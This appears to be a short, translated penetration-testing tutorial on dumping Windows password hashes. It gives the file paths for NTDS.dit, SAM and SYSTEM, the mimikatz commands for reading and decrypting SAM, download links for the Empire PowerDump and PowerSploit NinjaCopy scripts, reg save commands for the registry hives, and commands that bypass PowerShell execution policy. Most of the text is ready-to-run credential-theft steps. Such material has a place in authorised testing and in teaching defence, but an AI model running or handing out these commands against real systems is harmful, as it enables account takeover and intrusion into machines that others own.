Preface
ntds.dit file location:
C:\Windows\NTDS\NTDS.dit
system file location:C:\Windows\System32\config\SYSTEM
sam file location:C:\Windows\System32\config\SAM
#Method of obtaining user hash through SAM database
Remote reading
mimikatz reads the SAM database online
privilege::debug
token::elevate
lsadump::sam
powershell
Using a powershell script in empire, download the address:
https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-PowerDump.ps1
From left to right are the username, Rid, ntlm , Lm.
A Rid of 500 represents an administrator, 504 represents a guest account, etc. The difference between lm and ntlm is the encryption method. You can read this blog for details .
Offline cracking
How to download system and sam files
Use the registry (requires administrator permissions)
Get the SAM database file of the current system and read it under another system. Extracting the local user password hash of the target system from SAM requires administrator privileges.
reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
Obtain sam and system through NinjaCopy
ninjacopy download address: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1
Import-Module -name .\Invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination "c:\system.hiv"
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SAM" -LocalDestination "c:\sam.hiv"
Appendix: Commands to bypass the powershell execution strategy:
cmd: powershell -ep bypass
powershell: Set-ExecutionPolicy Bypass -Scope Process
You can also refer to the following link to
bypass the powershell execution strategy
Decrypt sam file data
Using mimikatz, the parameter is the path of the system and sam files just downloaded:
lsadump::sam /sam:sam.hiv /system:system.hiv
